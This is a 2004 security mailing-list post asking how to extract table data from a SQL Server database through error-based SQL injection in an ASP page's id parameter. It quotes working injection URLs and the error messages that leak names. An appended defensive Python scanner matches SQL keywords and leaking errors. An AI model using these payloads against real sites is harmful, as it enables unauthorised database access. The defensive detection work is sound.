WebApp Sec mailing list archives
SQL Injection data retrieving??
From: Roland Despins <roland2004 () romandie com>
Date: 10 Sep 2004 12:06:56 -0000
Hi, I'm practicing for a pentest. I'm trying to retrieve data from a DB using some SQL injections.
For now I assume that my WebApp is vulnerable to SQL injections.

First I've sent this URL:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc))

And I've got the following error:

Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__big_field' to a column of data type int.
/products.asp, line 32

I assume that "__big_field" is the name of the database? Right?

Secondly I've sent the following URL in order to get the table name:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc))

Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__dellist' to a column of data type int.
/products.asp, line 32

So "__dellist" is a table from the "__big_field" database? Right?

Now here comes the trouble... I would like to retrieve the column names of the "__dellist" table and the data of the "__dellist". I've sent:

www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))

Error Type: Microsoft OLE DB Provider for SQL Server (0x80004005)
Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.
/products.asp, line 32

My question is: Which query should I send in order to retrieve the data of the table??

Thanks a lot in advance for your help

Roland
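A defender-side view of the requests and error quoted above, as an added example that is not part of the original post: it checks whether the `id` parameter is a plain integer and whether the response echoes a database value in an OLE DB conversion error. The log tuples are constructed sample data (the second reuses the request and error text from the post), and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample entries: (method, URL, response body excerpt).
# The second entry reuses the second request and error quoted in the post.
SAMPLE_LOG = [
    ("GET", "/products.asp?id=42", "<html>Product 42</html>"),
    ("GET", "/products.asp?id=convert(int,(select top 1 name from sysobjects "
            "where xtype='u' and name>'__big_field' order by 1 asc))",
     "Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting "
     "the nvarchar value '__dellist' to a column of data type int."),
    ("GET", "/products.asp?id=7%20or%201=1", "<html>Product list</html>"),
]

INT_RE = re.compile(r"[0-9]{1,9}")  # the only shape a product id should have
SQL_TOKENS = re.compile(
    r"\b(select|convert|cast|union|sysobjects|syscolumns|information_schema)\b", re.I)
# Conversion error that echoes a stored value back to the client, as in the post.
LEAK_RE = re.compile(r"0x80040E07.*converting the \w+ value '([^']*)'", re.I | re.S)

def classify(url, body):
    """Return findings for one request/response pair."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("id", [])
    finding = {"id_valid": True, "sql_tokens": [], "leaked_value": None}
    for v in values:
        if not INT_RE.fullmatch(v):  # strict allow-list, not a keyword block-list
            finding["id_valid"] = False
            finding["sql_tokens"] += [t.lower() for t in SQL_TOKENS.findall(v)]
    m = LEAK_RE.search(body)
    if m:
        finding["leaked_value"] = m.group(1)
    return finding

def scan(log):
    """Return (url, finding) for entries with a non-integer id or a leaking response."""
    hits = []
    for _method, url, body in log:
        f = classify(url, body)
        if not f["id_valid"] or f["leaked_value"] is not None:
            hits.append((url, f))
    return hits

if __name__ == "__main__":
    for url, f in scan(SAMPLE_LOG):
        print(url, f)
```

The third sample carries no listed keyword yet still fails the integer check, which is why the allow-list on the parameter, not the keyword match, is the control to rely on.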